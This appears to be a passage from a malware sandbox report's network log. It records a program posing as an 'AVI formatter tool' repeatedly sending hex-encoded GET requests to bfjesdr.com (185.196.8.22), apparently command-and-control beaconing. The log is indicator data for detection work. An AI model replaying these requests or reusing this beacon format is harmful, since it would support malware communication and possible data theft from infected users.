                                                                                                                                                        Jan 13, 2024 06:33:13.090413094 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:13.320611000 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:13 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:13.434138060 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:13.650706053 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:13 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        25192.168.2.449763185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:13.971772909 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:14.193152905 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:14 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:14.309309959 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:14.526736975 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:14 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        26192.168.2.449764185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:14.846693039 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:15.062879086 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:14 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        27192.168.2.449765185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:15.387190104 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:15.609944105 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:15 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        28192.168.2.449766185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:15.931714058 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:16.154150009 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:16 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        29192.168.2.449767185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:16.786056042 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:17.002783060 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:16 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        30192.168.2.449768185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:18.792203903 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:19.013776064 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:18 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        31192.168.2.449769185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:19.323282003 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:19.545475960 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:19 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        32192.168.2.449770185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:19.860307932 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:20.077200890 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:19 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        33192.168.2.449771185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:20.385287046 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:20.605820894 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:20 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        34192.168.2.449772185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:20.917853117 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:21.145807981 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:21 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:21.260404110 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:21.477252007 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:21 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:21.589920998 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:21.806840897 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:21 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:21.921629906 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:22.143377066 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:22 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        35192.168.2.449773185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:22.447246075 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:22.664195061 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:22 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:22.776323080 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:22.993115902 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:22 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:23.104121923 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:23.326683044 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:23 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        36192.168.2.449774185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:23.635052919 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:23.851478100 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:23 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        37192.168.2.449775185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:33:24.160497904 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:24.382257938 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:24 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:24.495011091 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:24.711961985 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:24 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:24.822813988 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:33:25.039720058 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:33:24 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:33:25.150953054 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
